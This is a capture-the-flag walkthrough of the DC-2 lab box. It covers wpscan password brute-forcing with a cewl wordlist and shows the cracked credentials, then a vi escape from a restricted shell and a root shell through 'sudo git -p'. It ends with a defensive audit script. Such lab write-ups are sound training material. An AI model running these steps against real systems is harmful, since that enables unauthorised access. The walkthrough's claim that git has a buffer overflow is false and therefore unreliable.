Redirection
Discover the host:
Host is up (0.000063s latency).
Nmap scan report for 192.168.88.138
Port scan results:
PORT STATE SERVICE
80/tcp open http
7744/tcp open raqmon-pdu
Check port 7744 in detail; it turns out to be SSH.
nmap -p- 192.168.88.138 -A
Browsing to port 80 fails: the browser is redirected to the hostname DC-2, so the site relies on a DNS/hostname binding. Fix this by mapping the name in the local hosts file.
On Windows the hosts file lives in:
C:\Windows\System32\drivers\etc
Add this entry to the hosts file:
192.168.88.138 dc-2
On Kali: vim /etc/hosts
Flag 1
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Using cewl and wpscan
Cewl is a Ruby application that generates a wordlist from a website's content; the wordlist can then be fed to a password-cracking tool.
cewl http://dc-2/ > pass.txt
Once we have candidate passwords we still need usernames and a login form. Use wpscan, the WordPress-focused scanner bundled with Kali, to enumerate usernames:
wpscan --url http://dc-2/ -e u
Create a text file holding the usernames (admin, jerry, tom):
touch user.txt
Directory scan to find the backend login form
dirb is a dictionary-based web directory scanner:
dirb http://dc-2
Brute-force directly:
wpscan --url http://dc-2/ -U user.txt -P pass.txt
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Looking around the backend, we find:
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
rbash privilege escalation, $PATH
The hint means the backend site can't be exploited further, so try port 7744 instead:
ssh tom@dc-2 -p 7744
Problem 1: after logging in, the cat command can't be used:
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
-rbash is a restricted shell.
Check which commands are available:
ls /home/tom/usr/bin
less ls scp vi
The idea is to change the shell to /bin/sh (try a vi escape):
:set shell=/bin/sh
:shell
Problem 2: /bin/sh: 2: cat: not found, the directory holding the cat executable is not on the PATH:
$ ls
flag3.txt usr
$ cat flag3.txt
/bin/sh: 2: cat: not found
Check which executable directories are currently set:
echo $PATH
Now set the path:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
Flag3:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he cause
su
The hint is that we need to switch users:
$ su jerry
Password:
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
Change into jerry's home directory:
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
git privilege escalation
The hint says to use git to escalate and grab the final flag.
git has a buffer overflow vulnerability; when run as sudo git -p, commands can be executed with root privileges without entering the root password.
sudo git -p
Use the pager display:
!/bin/sh
# whoami
root
# cd ~
# ls
final-flag.txt
# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
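As an added defender-side check (not part of the original writeup), the following POSIX sh script audits the two weak spots this box demonstrates: a restricted shell whose allowed binaries (less, scp, vi) can spawn a full shell, and a sudo NOPASSWD rule granting such a binary as root. The sudoers fragment is constructed to match the behaviour shown; the box's actual sudoers file does not appear in the writeup.

```shell
#!/bin/sh
# Added audit helper, not from the original writeup. It flags restricted-
# shell binaries and sudo NOPASSWD rules that hand the caller a full shell.

# Binaries with well-known shell escapes: vi ":shell", less/more/man "!",
# git's pager, scp -S. Extend the list to match your own baseline.
ESCAPERS='vi vim less more man git scp'

is_escaper() {
  # True when the basename of $1 is in ESCAPERS.
  name=${1##*/}
  for e in $ESCAPERS; do
    if [ "$e" = "$name" ]; then return 0; fi
  done
  return 1
}

audit_rbash_bins() {
  # $1: space-separated binaries reachable from the restricted PATH.
  # Prints the ones that defeat the restriction, one per line.
  for b in $1; do
    if is_escaper "$b"; then printf '%s\n' "$b"; fi
  done
  return 0
}

audit_sudoers() {
  # $1: sudoers text. Prints "user:binary" for each NOPASSWD rule whose
  # command list contains a shell-escaping binary; comments are skipped.
  printf '%s\n' "$1" | while IFS= read -r line; do
    case $line in ''|'#'*|Defaults*) continue ;; esac
    case $line in *NOPASSWD:*) ;; *) continue ;; esac
    set -- $line; user=$1
    cmds=$(printf '%s' "${line##*NOPASSWD:}" | tr ',' ' ')
    for c in $cmds; do
      if is_escaper "$c"; then printf '%s:%s\n' "$user" "${c##*/}"; fi
    done
  done
  return 0
}

# Constructed samples: tom's allowed binaries from the writeup, and a
# sudoers rule of the shape that lets jerry run git as root (assumed).
TOM_BINS='less ls scp vi'
SUDOERS_SAMPLE='# User privilege specification
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
tom     ALL=(root) NOPASSWD: /usr/bin/id, /usr/bin/less'

audit_rbash_bins "$TOM_BINS"; audit_sudoers "$SUDOERS_SAMPLE"
```

On the sample input the script reports less, scp and vi as escapable restricted-shell binaries and flags jerry:git and tom:less from the sudoers rules.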
Source: https://www.cnblogs.com/nagoya/p/16954949.html